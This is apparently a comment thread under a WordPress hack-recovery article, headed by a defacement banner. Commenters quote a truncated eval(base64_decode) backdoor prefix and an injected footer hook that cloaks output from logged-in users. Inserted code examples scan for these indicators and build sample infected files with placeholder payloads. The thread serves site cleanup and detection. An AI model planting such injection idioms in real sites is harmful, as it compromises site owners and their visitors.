    .:: HACKED By R3YR3 ::. | r3yr3[dot]m4iL[at]gmail[dot]com |


  103. If a person’s site is still being hacked, till you can find another way to keep them out, you should be the only one going in and only from home – one place. Do google searches and learn about htaccess files. then, if possible, make use of them.

    To keep everyone but you out of admin, make sure no one but you knows your FTP password. Change it before you do anything else, and again afterwards. Several ftp id’s and pw’s can be created by a hacker once he is in. Go to your cPanel (?) and make sure that there are none created that you do not know about – probably none. period. If a hacker can get in with ftp, they can shoot down your htaccess file also.


  104. My site was hacked today. I have this code:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9");

    at the top of all of my PHP files.

    I think I need to do a complete re-install. I don't have the WordPress folder backed up, but I do have a clean back of my database. So, can I just delete my current installation and database, install a new wordpress and then restore the database? Or is it more complicated?

    Thanks
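    An added example, not from the post or any commenter, for the file-side checks that several comments in this thread describe: the eval(base64_decode(...)) prefix found at the top of PHP files, the eval(gzinflate(base64_decode( and String.fromCharCode hits reported by the Exploit Scanner, the runtime script injector seen in script.js, and theme files left writable after using the online editor. It walks a WordPress tree, flags those indicators plus group/world-writable files, and builds a constructed mini install in a temp directory to run against; the base64 string in the sample is a labelled placeholder, not a real payload.

```python
import os
import re
import stat
import tempfile

# Indicator patterns taken from what commenters report finding. Constructed
# regexes; a hit is a reason to inspect the file, not proof of compromise.
INDICATORS = {
    "eval_base64": re.compile(r"eval\s*\(\s*(gzinflate\s*\(\s*)?base64_decode\s*\(", re.I),
    "fromcharcode": re.compile(r"String\.fromCharCode\s*\(", re.I),
    "hidden_iframe": re.compile(
        r"<iframe[^>]*(display\s*:\s*none|width\s*=\s*['\"]?0|height\s*=\s*['\"]?0)",
        re.I | re.S),
    "runtime_script_inject": re.compile(
        r"document\.createElement\s*\(\s*['\"]script['\"]\s*\)", re.I),
}


def scan_text(text):
    """Names of the indicators present in one file's contents, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root, exts=(".php", ".js", ".htaccess")):
    """Walk a WordPress install; report indicator hits and files writable by
    group or others (permissions left loose after editing themes online)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            mode = os.stat(path).st_mode
            writable = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
            if hits or writable:
                findings.append({"path": os.path.relpath(path, root),
                                 "indicators": hits, "loose_perms": writable})
    return sorted(findings, key=lambda f: f["path"])


def build_sample_site():
    """Constructed mini install: one clean file, one theme file with an
    eval(base64_decode()) prefix and loose permissions, one injected script."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    theme = os.path.join(root, "wp-content", "themes", "demo")
    os.makedirs(theme)
    samples = {
        "index.php": "<?php require './wp-blog-header.php';\n",
        "wp-content/themes/demo/header.php":
            "<?php /**/ eval(base64_decode(\"PLACEHOLDER_NOT_A_REAL_PAYLOAD\")); ?>\n<html>",
        "wp-content/themes/demo/script.js":
            "/*GNU GPL*/ try{window.onload=function(){var s=document.createElement('script');"
            "s.setAttribute('src', String.fromCharCode(104,116,116,112));}}catch(e){}",
    }
    for rel, body in samples.items():
        p = os.path.join(root, rel)
        with open(p, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(p, 0o644)
    os.chmod(os.path.join(theme, "header.php"), 0o666)  # left writable on purpose
    return root


if __name__ == "__main__":
    for finding in scan_tree(build_sample_site()):
        print(finding)
```

    Point `scan_tree` at the document root of a real install and compare any flagged file against a fresh copy from wordpress.org before deleting it; a clean reinstall of WordPress core, as the comment above proposes, does not touch wp-content, so themes, plugins and uploads still need this pass.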


  105. Please add that the theme files could be changed; that was so in my case, so I uninstalled the theme, reinstalled it again and that worked fine for me


  106. I have noticed in the past that that base64 code shows up in freeware WP templates. So, beware what templates you pick, the “backdoor” hacker code may already be in an otherwise innocent template and will leave the back gate open to your blog once you install it.


  107. Hello from Germany! May i quote a post a translated part of your blog with a link to you? I’ve tried to contact you for the topic Did your WordPress site get hacked?, but i got no answer, please reply when you have a moment, thanks, Gedicht


  108. Seriously that exploit tool was INVALUABLE to me!!! THANK YOU SOOOOOOOO much!!!!!!! I’ve been working on an issue for months, and I was finally able to resolve it with your tool. Thank you again!


  109. My website has wordpress on it, and it got hacked, and everything was stolen, and destroyed! i looked at a page, and code was everywhere!!!

    My SQL dbs all have been screwed up! so now i am sad


  110. Regarding Exploit Scanner .95:

    This thing was nothing but a headache for me. I had to change the files from 50 to 40 to avoid memory problems. After spending several hours scanning 18,000 files, there was silence. Nothing say good or bad.

    On top of that, it increased my database options table from 1 mb to 800 mb. Yes you read that right. 1 mb to 800 mb by adding records that don’t get deleted even when the plugin is deactivated. I only noticed it when I tried to backup my database for upgrade to WP3.0. I had to use phpMyAdmin to search for all the records and delete them and then repair the database to regain the empty space. It’s not something for the faint of heart.

    If you’re going to try this, backup your database first and check the size afterward.


  111. I encountered a problem, in which if I search my blog via Google or any search engine, if I click the link I’ll be redirected to another site.

    Thanks to this article, I kinda got it by eval(), which has been stated, and also I haven’t seen that part in my wp config when I installed my WordPress blog.

    So i deleted it and its working fine now. Thank you so much.

    God speed..:)


  112. Donncha,
    A blog site of mine got nailed around 4 weeks ago.
    Completely pissed me off. the DB was deleted and my wordpress theme screwed up by some fecker.

    I actually think that the scumbag got in via an issue with FileZilla FTP (I have my password bookmarked with this program).

    Anyway, lots of tear drops.
    Thanks for sharing your article.


  113. Hi

    I have studied your list carefully because someone has attacked my website. I can find any malware. My database looks fine and I can not find the hidden code you are writing about.

    It is strange they can change my title line in the search engine but not in my code.


  114. “That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.”

    And if they put a backdoor file in cache/ and modify the .htaccess to be able to access it later? Untraceable.


    1. Yup, then you’re screwed. I disabled AIDE a long time ago. The daily emails were too full of things I didn’t care about to look at them every day.


  115. We suspect that a friend of mine’s WordPress site got hacked. Every time you type in his domain name without the www. in front, it redirects to default.com. Any ideas why this is?


  116. I have a static site and do not blog, so all I have to do, even if the backups are messed up, is make the page/child structure, add the child’s CSS, add the HTML from saved Notepad files and images, and I am off.

    I feel sorry for people that have to trawl through 3000 pages of crap to filter stuff out. I only download from the official repository and nowhere else. I keep WP up to date even if it breaks my site, and then fix the pages. I use most of the security-related plugins as well, even though they scare me just as much.


  117. I got this page as the first result from searching on xmlrpc.php
    Because some kid was trying to hack my site …
    I noticed his weird query for the xmlrpc.php file in the WassUp visitor history.
    First I blocked him from the .htaccess file.
    Anyway, he failed in his hack attempt ..
    I use WP 3.0.1


  118. Hello,

    PLEASE HELP ME! I have a site running in WP. Recently when I visit it, I get a ‘Malware found’ page. Also when I access the Dashboard, I get some ‘Http:… blah blah’ message at the top, outside the theme. I can’t even download the XML export so that I can update to 3.0.5 as my site runs on 3.0.1. The plugins I had installed were Wassup stats, Akismet, W3 total cache, Fancy pull quotes, News and events, Notices plugin. I’m using Atahualpa theme 4.9.
    Please help me get the malware out!


  119. I don’t know if my blog was hacked, but one of my blogs suddenly has no posts. All of my posts are gone. Can you tell me if this is a kind of hack?


  120. Thank you very much for these tips on securing your WP site, I’ll definitely use tripwire and a couple other tools to try to secure the site. Again thank you very much for your time writing this blog.

    Pete


  121. Hi Donncha,

    Do you have any idea why some of my plugins are not showing on my admin dashboard although they are installed in my plugins folder? Two of these plugins are WP Super Cache and WordPress Security Scan.. Also, I can no longer install plugins through the WordPress admin.. Any help would be appreciated..

    thanks,
    joliber


  122. - Installed the latest WP-Version 3.2.1 with the theme 2011.
    - Went to
    http://sitecheck.sucuri.net/scanner/
    and made the security scan:

    - Result was, that they showed the internal path
    Wordpress internal path: /internal_path/wordpress/wp-content/themes/twentyeleven/index.php
    - That means that all the people can see my database username.

    How do I avoid that?


  123. I’ve been hacked five times this year and after finally transferring to a new host, I’ve been uploading my old files and databases. Now I’m seriously reconsidering starting from scratch. That seems so much safer since scripts could be left in some of my files right? Sigh


  124. Dude, your post just saved me from having a heart attack!! Thanks a million. My site got hacked. I hadn’t updated my WordPress, but I was able to enter my dashboard, and from there I quickly updated to 3.3, and phew, that was a relief!

  125. Pingback: | SeoFuturity

  126. I’m searching by date, to determine unauthorised file modifications.
    `find $HOME -type f -mtime -30`
    Does a search for all files modified less than 30 days ago. Are crackers/hackers known for using `touch` to modify timestamps? or is date scanning a suitable technique?
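As an added example, not part of the comment above or of the article, one defender-side answer to the timestamp question: `touch` can backdate a file's modification time (mtime), but the inode change time (ctime) is set by the kernel on every write or attribute change and cannot be set by an ordinary user, so a file with a recent ctime and an old mtime deserves a look. It assumes only a POSIX `find` and `touch`; the directory and day count are arguments.

```shell
#!/bin/sh
# Added example: the commenter's mtime-only search beside a
# ctime/mtime mismatch search. `touch -t` can backdate mtime; ctime
# is updated by the kernel on any write or attribute change and is
# not settable by an unprivileged user, so a mismatch suggests a
# backdated file (or a recent chmod/chown, which is also worth a look).

# recent_by_mtime DIR DAYS
#   Files modified within the last DAYS days; equivalent to the
#   `find $HOME -type f -mtime -30` from the comment above.
recent_by_mtime() {
    find "$1" -type f -mtime "-$2" -print
}

# backdated_files DIR DAYS
#   Files whose inode changed within DAYS days but whose mtime is
#   older than DAYS days: something touched the file recently, yet
#   the mtime claims it is old. An mtime-only search misses these.
backdated_files() {
    find "$1" -type f -ctime "-$2" ! -mtime "-$2" -print
}

# Constructed demonstration on a temporary directory (not a real
# site): one freshly written file and one with its mtime forced
# back to 2010-01-01 the way an attacker might backdate a dropper.
demo() {
    tmp=$(mktemp -d) || return 1
    printf '<?php // clean\n' > "$tmp/index.php"
    printf '<?php // planted\n' > "$tmp/wp-blog-header.php"
    touch -t 201001010000 "$tmp/wp-blog-header.php"
    echo "mtime search (misses the backdated file):"
    recent_by_mtime "$tmp" 30
    echo "ctime/mtime mismatch search (finds it):"
    backdated_files "$tmp" 30
    rm -rf "$tmp"
}

if [ "${1-}" = "demo" ]; then demo; fi
```

Run it with `sh script.sh demo` to see both searches on the constructed files; a baseline tool such as the AIDE or tripwire the article mentions catches content changes that neither timestamp check can.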


  127. Phew, my sites were attacked again, and they uploaded a phishing script to my sites. Can I find out where the backdoor is using your Exploit Scanner plugin?


  128. I can’t change the read and write permissions on the “wp-admin” folder after being attacked… is there a way to fix this?


  129. Thank you!! Seriously, you just saved my bacon. With this post I was back up and looking good in less than an hour, while on a conference call the whole time.


  130. My site also got hacked and they injected some script into functions.php like this:

    <?php
    add_action('get_footer', 'add_sscounter');
    function add_sscounter() {
        echo '';
        if (function_exists('is_user_logged_in')) {
            if (time() % 2 == 0 && !is_user_logged_in()) {
                echo '';
            }
        }
    }
    ?>

    I have cleaned up my site and hope it doesn’t happen again with my site.
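As an added example (not the commenter's or the article's code), a small scan for the markers in the snippet above, namely output gated on the visitor not being logged in plus a time() condition, alongside the eval()/base64_decode() calls the article itself warns about. It assumes a `grep` that supports `-r` and `--include` (GNU and BSD both do); hits are leads for a manual read, not proof of compromise.

```shell
#!/bin/sh
# Added example: grep *.php files under a WordPress directory for the
# cloaking idiom shown in the injected snippet (content only for
# visitors who are not logged in, on a time-based condition) and for
# the eval()/base64_decode() patterns the article warns about.
# Legitimate themes call is_user_logged_in() too, so only the negated
# form is matched; every hit still needs a human read.

# scan_cloaked_output DIR
#   Prints "file:line:text" for each matching line in *.php under
#   DIR. Exit status is 0 when at least one line matched.
scan_cloaked_output() {
    grep -rnE --include='*.php' \
        -e 'base64_decode[[:space:]]*\(' \
        -e '(^|[^[:alnum:]_])eval[[:space:]]*\(' \
        -e '![[:space:]]*is_user_logged_in[[:space:]]*\(' \
        -e 'time[[:space:]]*\([[:space:]]*\)[[:space:]]*%' \
        "$1"
}

# Constructed demonstration (not a real site): one ordinary footer
# hook and one file carrying the idiom from the comment above.
demo() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/themes/demo"
    printf '<?php add_action("get_footer", "site_credits");\n' \
        > "$tmp/themes/demo/footer.php"
    printf '<?php if (time() %% 2 == 0 && !is_user_logged_in()) { echo ""; }\n' \
        > "$tmp/themes/demo/functions.php"
    scan_cloaked_output "$tmp"
    rm -rf "$tmp"
}

if [ "${1-}" = "demo" ]; then demo; fi
```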


  131. Don’t forget to change your FTP & WordPress passwords. We are seeing a lot of websites getting hacked from personal pcs getting infected directly via FTP. Then the hacker uploads a shell script (a back door). Look for a back door if you’ve been hacked. Use at least 12 random characters. We recommend that you use a password generator. Hope that helps.


  132. Thanks for all this info, but what if they change the cPanel password?
    Because my cPanel is also not opening.


  133. You might find this amusing. My SonicWall blocks attempts to visit (this post only) unless I (temporarily) add your IP address to the list of IPs not to scan for viruses. Here’s the message I get:

    Gateway Anti-Virus Alert

    This request is blocked by the SonicWALL Gateway Anti-Virus Service. If you feel this message is an error, please contact your IT Support staff. Name: Suspicious#gumblar_5 (Trojan)
